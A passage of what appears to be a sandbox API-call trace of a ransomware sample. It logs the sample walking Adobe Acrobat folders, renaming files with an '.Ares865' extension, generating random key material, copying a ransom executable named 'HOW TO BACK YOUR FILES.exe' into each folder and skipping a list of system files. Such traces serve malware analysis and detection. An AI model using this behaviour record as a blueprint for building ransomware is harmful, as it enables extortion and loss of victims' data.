halpmcxz\\application data\\adobe\\acrobat\\10.0\\security\\addressbook.acrodata.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0109.076] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=5399) returned 1 [0109.077] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0518) returned 1 [0109.077] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0109.077] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0109.081] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0518) returned 1 [0109.082] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0109.082] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0109.083] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Application Data\\Adobe\\Acrobat\\10.0\\Security\\CRLCache", iMaxLength=260 | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Application Data\\Adobe\\Acrobat\\10.0\\Security\\CRLCache") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Application Data\\Adobe\\Acrobat\\10.0\\Security\\CRLCache" [0109.083] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x324fc8 | out: hHeap=0x2b0000) returned 1 [0109.083] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e7ba8 | out: hHeap=0x2b0000) returned 1 [0109.083] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Application Data\\Adobe\\Acrobat\\10.0\\Security\\CRLCache") returned 83 [0109.083] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Application Data\\Adobe\\Acrobat\\10.0\\Security\\CRLCache" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Application Data\\Adobe\\Acrobat\\10.0\\Security\\CRLCache") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Application Data\\Adobe\\Acrobat\\10.0\\Security\\CRLCache" [0109.083] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0109.083] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Application Data\\Adobe\\Acrobat\\10.0\\Security\\CRLCache\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\application data\\adobe\\acrobat\\10.0\\security\\crlcache\\how to back your files.exe"), bFailIfExists=1) returned 0 [0109.084] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0109.084] GetLastError () returned 0x0 [0109.084] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Application Data\\Adobe\\Acrobat\\10.0\\Security\\CRLCache\\48B76449F3D5FEFA1133AA805E420F0FCA643651.crl.Ares865") returned 136 [0109.084] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Application Data\\Adobe\\Acrobat\\10.0\\Security\\CRLCache\\48B76449F3D5FEFA1133AA805E420F0FCA643651.crl" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\application data\\adobe\\acrobat\\10.0\\security\\crlcache\\48b76449f3d5fefa1133aa805e420f0fca643651.crl"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Application Data\\Adobe\\Acrobat\\10.0\\Security\\CRLCache\\48B76449F3D5FEFA1133AA805E420F0FCA643651.crl.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\application data\\adobe\\acrobat\\10.0\\security\\crlcache\\48b76449f3d5fefa1133aa805e420f0fca643651.crl.ares865"), dwFlags=0x1) returned 1 [0109.086] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Application Data\\Adobe\\Acrobat\\10.0\\Security\\CRLCache\\48B76449F3D5FEFA1133AA805E420F0FCA643651.crl.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\application data\\adobe\\acrobat\\10.0\\security\\crlcache\\48b76449f3d5fefa1133aa805e420f0fca643651.crl.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0109.086] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=933) returned 1 [0109.086] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0518) returned 1 [0109.087] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0109.087] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0109.090] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0518) returned 1 [0109.096] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0109.096] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0109.096] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Application Data\\Adobe\\Acrobat\\10.0\\Security\\CRLCache\\A9B8213768ADC68AF64FCC6409E8BE414726687F.crl.Ares865") returned 136 [0109.096] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Application Data\\Adobe\\Acrobat\\10.0\\Security\\CRLCache\\A9B8213768ADC68AF64FCC6409E8BE414726687F.crl" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\application data\\adobe\\acrobat\\10.0\\security\\crlcache\\a9b8213768adc68af64fcc6409e8be414726687f.crl"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Application Data\\Adobe\\Acrobat\\10.0\\Security\\CRLCache\\A9B8213768ADC68AF64FCC6409E8BE414726687F.crl.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\application data\\adobe\\acrobat\\10.0\\security\\crlcache\\a9b8213768adc68af64fcc6409e8be414726687f.crl.ares865"), dwFlags=0x1) returned 1 [0109.098] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Application Data\\Adobe\\Acrobat\\10.0\\Security\\CRLCache\\A9B8213768ADC68AF64FCC6409E8BE414726687F.crl.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\application data\\adobe\\acrobat\\10.0\\security\\crlcache\\a9b8213768adc68af64fcc6409e8be414726687f.crl.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0109.098] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=37703) returned 1 [0109.098] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0518) returned 1 [0109.099] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0109.099] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0109.111] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0518) returned 1 [0109.116] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0109.116] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0109.122] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Application Data\\Adobe\\Acrobat\\10.0\\JavaScripts", iMaxLength=260 | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Application Data\\Adobe\\Acrobat\\10.0\\JavaScripts") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Application Data\\Adobe\\Acrobat\\10.0\\JavaScripts" [0109.122] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2cfda8 | out: hHeap=0x2b0000) returned 1 [0109.123] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e79c8 | out: hHeap=0x2b0000) returned 1 [0109.123] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Application Data\\Adobe\\Acrobat\\10.0\\JavaScripts") returned 77 [0109.123] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Application Data\\Adobe\\Acrobat\\10.0\\JavaScripts" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Application Data\\Adobe\\Acrobat\\10.0\\JavaScripts") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Application Data\\Adobe\\Acrobat\\10.0\\JavaScripts" [0109.123] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0109.124] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Application Data\\Adobe\\Acrobat\\10.0\\JavaScripts\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\application data\\adobe\\acrobat\\10.0\\javascripts\\how to back your files.exe"), bFailIfExists=1) returned 0 [0109.127] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0109.131] GetLastError () returned 0x0 [0109.131] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x1dc00) returned 0x33cfb0 [0109.132] ReadFile (in: hFile=0x120, lpBuffer=0x33cfb0, nNumberOfBytesToRead=0x1dc00, lpNumberOfBytesRead=0x2cce0dc, lpOverlapped=0x0 | out: lpBuffer=0x33cfb0*, lpNumberOfBytesRead=0x2cce0dc*=0x1dc00, lpOverlapped=0x0) returned 1 [0109.132] CloseHandle (hObject=0x120) returned 1 [0109.132] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x33cfb0 | out: hHeap=0x2b0000) returned 1 [0109.132] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0109.132] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Application Data\\Adobe\\Acrobat\\10.0\\JavaScripts\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xec7c9cd0, ftCreationTime.dwHighDateTime=0x1d2ddf4, ftLastAccessTime.dwLowDateTime=0x50b639c0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x50b639c0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccde8 [0109.133] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0109.133] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0109.133] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0109.133] FindNextFileW (in: hFindFile=0x2ccde8, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xec7c9cd0, ftCreationTime.dwHighDateTime=0x1d2ddf4, ftLastAccessTime.dwLowDateTime=0x50b639c0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x50b639c0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0109.133] lstrcmpiW (lpString1="..", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0109.133] lstrcmpiW (lpString1="..", lpString2="aoldtz.exe") returned -1 [0109.133] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0109.133] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0109.133] FindNextFileW (in: hFindFile=0x2ccde8, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xec7c9cd0, ftCreationTime.dwHighDateTime=0x1d2ddf4, ftLastAccessTime.dwLowDateTime=0xec7c9cd0, ftLastAccessTime.dwHighDateTime=0x1d2ddf4, ftLastWriteTime.dwLowDateTime=0xedc00b50, ftLastWriteTime.dwHighDateTime=0x1d35d05, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="glob.js", cAlternateFileName="")) returned 1 [0109.133] lstrcmpiW (lpString1="glob.js", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0109.133] lstrcmpiW (lpString1="glob.js", lpString2="aoldtz.exe") returned 1 [0109.135] lstrcmpiW (lpString1="glob.js", lpString2=".") returned 1 [0109.135] lstrcmpiW (lpString1="glob.js", lpString2="..") returned 1 [0109.136] lstrcmpiW (lpString1="glob.js", lpString2="windows") returned -1 [0109.136] lstrcmpiW (lpString1="glob.js", lpString2="bootmgr") returned 1 [0109.136] lstrcmpiW (lpString1="glob.js", lpString2="temp") returned -1 [0109.136] lstrcmpiW (lpString1="glob.js", lpString2="pagefile.sys") returned -1 [0109.136] lstrcmpiW (lpString1="glob.js", lpString2="boot") returned 1 [0109.136] lstrcmpiW (lpString1="glob.js", lpString2="ids.txt") returned -1 [0109.136] lstrcmpiW (lpString1="glob.js", lpString2="ntuser.dat") returned -1 [0109.136] lstrcmpiW (lpString1="glob.js", lpString2="perflogs") returned -1 [0109.136] lstrcmpiW (lpString1="glob.js", lpString2="MSBuild") returned -1 [0109.136] lstrlenW (lpString="glob.js") returned 7 [0109.137] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Application Data\\Adobe\\Acrobat\\10.0\\JavaScripts\\*") returned 79 [0109.137] lstrcpyW (in: lpString1=0x2cce49c, lpString2="glob.js" | out: lpString1="glob.js") returned="glob.js" [0109.138] lstrlenW (lpString="glob.js") returned 7 [0109.138] lstrlenW (lpString="Ares865") returned 7 [0109.138] lstrlenW (lpString=".dll") returned 4 [0109.138] lstrcmpiW (lpString1="glob.js", lpString2=".dll") returned 1 [0109.138] lstrlenW (lpString=".lnk") returned 4 [0109.138] lstrcmpiW (lpString1="glob.js", lpString2=".lnk") returned 1 [0109.138] lstrlenW (lpString=".ini") returned 4 [0109.138] lstrcmpiW (lpString1="glob.js", lpString2=".ini") returned 1 [0109.138] lstrlenW (lpString=".sys") returned 4 [0109.138] lstrcmpiW (lpString1="glob.js", lpString2=".sys") returned 1 [0109.138] lstrlenW (lpString="glob.js") returned 7 [0109.138] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Application Data\\Adobe\\Acrobat\\10.0\\JavaScripts\\glob.js.Ares865") returned 93 [0109.138] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Application Data\\Adobe\\Acrobat\\10.0\\JavaScripts\\glob.js" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\application data\\adobe\\acrobat\\10.0\\javascripts\\glob.js"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Application Data\\Adobe\\Acrobat\\10.0\\JavaScripts\\glob.js.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\application data\\adobe\\acrobat\\10.0\\javascripts\\glob.js.ares865"), dwFlags=0x1) returned 1 [0109.140] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Application Data\\Adobe\\Acrobat\\10.0\\JavaScripts\\glob.js.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\application data\\adobe\\acrobat\\10.0\\javascripts\\glob.js.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0109.141] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=0) returned 1 [0109.142] UnmapViewOfFile (lpBaseAddress=0x0) returned 0 [0109.145] CloseHandle (hObject=0x0) returned 0 [0109.145] CloseHandle (hObject=0x118) returned 1 [0109.145] FindNextFileW (in: hFindFile=0x2ccde8, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xec7c9cd0, ftCreationTime.dwHighDateTime=0x1d2ddf4, ftLastAccessTime.dwLowDateTime=0xec7c9cd0, ftLastAccessTime.dwHighDateTime=0x1d2ddf4, ftLastWriteTime.dwLowDateTime=0xedc00b50, ftLastWriteTime.dwHighDateTime=0x1d35d05, nFileSizeHigh=0x0, nFileSizeLow=0xa, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="glob.settings.js", cAlternateFileName="GLOBSE~1.JS")) returned 1 [0109.145] lstrcmpiW (lpString1="glob.settings.js", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0109.145] lstrcmpiW (lpString1="glob.settings.js", lpString2="aoldtz.exe") returned 1 [0109.145] lstrcmpiW (lpString1="glob.settings.js", lpString2=".") returned 1 [0109.145] lstrcmpiW (lpString1="glob.settings.js", lpString2="..") returned 1 [0109.145] lstrcmpiW (lpString1="glob.settings.js", lpString2="windows") returned -1 [0109.145] lstrcmpiW (lpString1="glob.settings.js", lpString2="bootmgr") returned 1 [0109.147] lstrcmpiW (lpString1="glob.settings.js", lpString2="temp") returned -1 [0109.147] lstrcmpiW (lpString1="glob.settings.js", lpString2="pagefile.sys") returned -1 [0109.147] lstrcmpiW (lpString1="glob.settings.js", lpString2="boot") returned 1 [0109.147] lstrcmpiW (lpString1="glob.settings.js", lpString2="ids.txt") returned -1 [0109.147] lstrcmpiW (lpString1="glob.settings.js", lpString2="ntuser.dat") returned -1 [0109.147] lstrcmpiW (lpString1="glob.settings.js", lpString2="perflogs") returned -1 [0109.147] lstrcmpiW (lpString1="glob.settings.js", lpString2="MSBuild") returned -1 [0109.147] lstrlenW (lpString="glob.settings.js") returned 16 [0109.147] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Application Data\\Adobe\\Acrobat\\10.0\\JavaScripts\\glob.js") returned 85 [0109.147] lstrcpyW (in: lpString1=0x2cce49c, lpString2="glob.settings.js" | out: lpString1="glob.settings.js") returned="glob.settings.js" [0109.147] lstrlenW (lpString="glob.settings.js") returned 16 [0109.147] lstrlenW (lpString="Ares865") returned 7 [0109.147] lstrcmpiW (lpString1="ings.js", lpString2="Ares865") returned 1 [0109.148] lstrlenW (lpString=".dll") returned 4 [0109.148] lstrcmpiW (lpString1="glob.settings.js", lpString2=".dll") returned 1 [0109.149] lstrlenW (lpString=".lnk") returned 4 [0109.149] lstrcmpiW (lpString1="glob.settings.js", lpString2=".lnk") returned 1 [0109.149] lstrlenW (lpString=".ini") returned 4 [0109.149] lstrcmpiW (lpString1="glob.settings.js", lpString2=".ini") returned 1 [0109.149] lstrlenW (lpString=".sys") returned 4 [0109.149] lstrcmpiW (lpString1="glob.settings.js", lpString2=".sys") returned 1 [0109.149] lstrlenW (lpString="glob.settings.js") returned 16 [0109.151] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Application Data\\Adobe\\Acrobat\\10.0\\JavaScripts\\glob.settings.js.Ares865") returned 102 [0109.151] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Application Data\\Adobe\\Acrobat\\10.0\\JavaScripts\\glob.settings.js" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\application data\\adobe\\acrobat\\10.0\\javascripts\\glob.settings.js"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Application Data\\Adobe\\Acrobat\\10.0\\JavaScripts\\glob.settings.js.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\application data\\adobe\\acrobat\\10.0\\javascripts\\glob.settings.js.ares865"), dwFlags=0x1) returned 1 [0109.155] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Application Data\\Adobe\\Acrobat\\10.0\\JavaScripts\\glob.settings.js.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\application data\\adobe\\acrobat\\10.0\\javascripts\\glob.settings.js.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0109.156] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=10) returned 1 [0109.157] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x200300) returned 0x2cd0020 [0109.158] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2d2ef0 [0109.159] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x80) returned 0x2f00d8 [0109.159] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0518) returned 1 [0109.160] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0109.160] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0109.162] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0518) returned 1 [0109.163] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0109.163] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0109.164] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Application Data\\Adobe\\Acrobat\\10.0\\Forms", iMaxLength=260 | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Application Data\\Adobe\\Acrobat\\10.0\\Forms") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Application Data\\Adobe\\Acrobat\\10.0\\Forms" [0109.164] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x320fc8 | out: hHeap=0x2b0000) returned 1 [0109.164] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e79a8 | out: hHeap=0x2b0000) returned 1 [0109.164] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Application Data\\Adobe\\Acrobat\\10.0\\Forms") returned 71 [0109.164] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Application Data\\Adobe\\Acrobat\\10.0\\Forms" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Application Data\\Adobe\\Acrobat\\10.0\\Forms") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Application Data\\Adobe\\Acrobat\\10.0\\Forms" [0109.164] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0109.164] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Application Data\\Adobe\\Acrobat\\10.0\\Forms\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\application data\\adobe\\acrobat\\10.0\\forms\\how to back your files.exe"), bFailIfExists=1) returned 0 [0109.165] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0109.165] GetLastError () returned 0x0 [0109.165] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x1dc00) returned 0x33cfb0 [0109.165] ReadFile (in: hFile=0x120, lpBuffer=0x33cfb0, nNumberOfBytesToRead=0x1dc00, lpNumberOfBytesRead=0x2cce0dc, lpOverlapped=0x0 | out: lpBuffer=0x33cfb0*, lpNumberOfBytesRead=0x2cce0dc*=0x1dc00, lpOverlapped=0x0) returned 1 [0109.165] CloseHandle (hObject=0x120) returned 1 [0109.165] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x33cfb0 | out: hHeap=0x2b0000) returned 1 [0109.165] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0109.165] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Application Data\\Adobe\\Acrobat\\10.0\\Forms\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xd9df17a0, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0x50b639c0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x50b639c0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccde8 [0109.165] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0109.165] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0109.165] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0109.165] FindNextFileW (in: hFindFile=0x2ccde8, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xd9df17a0, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0x50b639c0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x50b639c0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0109.165] lstrcmpiW (lpString1="..", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0109.165] lstrcmpiW (lpString1="..", lpString2="aoldtz.exe") returned -1 [0109.166] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0109.166] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0109.166] FindNextFileW (in: hFindFile=0x2ccde8, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x50b639c0, ftCreationTime.dwHighDateTime=0x1d56a3b, ftLastAccessTime.dwLowDateTime=0x50b639c0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x48f29da0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, 